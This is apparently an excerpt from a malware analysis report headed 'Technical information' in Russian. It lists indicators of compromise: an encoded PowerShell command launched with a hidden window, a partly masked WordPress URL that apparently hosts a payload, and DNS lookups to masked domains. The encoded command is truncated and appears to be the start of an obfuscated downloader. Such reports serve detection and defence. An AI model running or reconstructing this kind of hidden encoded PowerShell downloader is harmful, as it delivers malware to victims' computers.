Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABhAE0AUABjAFoAMwBqAD0AJwBZAFgAaAB3AE0AagAnADsAJABSAGkAUwBUADAAcAAgAD0AIAAnADcAMQAnADsAJABiAE0ATQA2AFAAbwA9ACcAdABiAHEAMwAyAFoARABrACcAOwAkAG4AVgBBADkAMgA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcA...
- http://ce####guler.com.tr/wp-content/RvpHbye/
- DNS ASK un####medsshop.com
- DNS ASK ce####guler.com.tr
- DNS ASK ke#####ipeslchf.site
- DNS ASK bo####ngals.info
- DNS ASK bi####vers.blog.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABhAE0AUABjAFoAMwBqAD0AJwBZAFgAaAB3AE0AagAnADsAJABSAGkAUwBUADAAcAAgAD0AIAAnADcAMQAnADsAJABiAE0ATQA2AFAAbwA9ACcAdABiAHEAMwAyAFoARABrACcAOwAkAG4AVgBBADkAMgA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcA...' (со скрытым окном)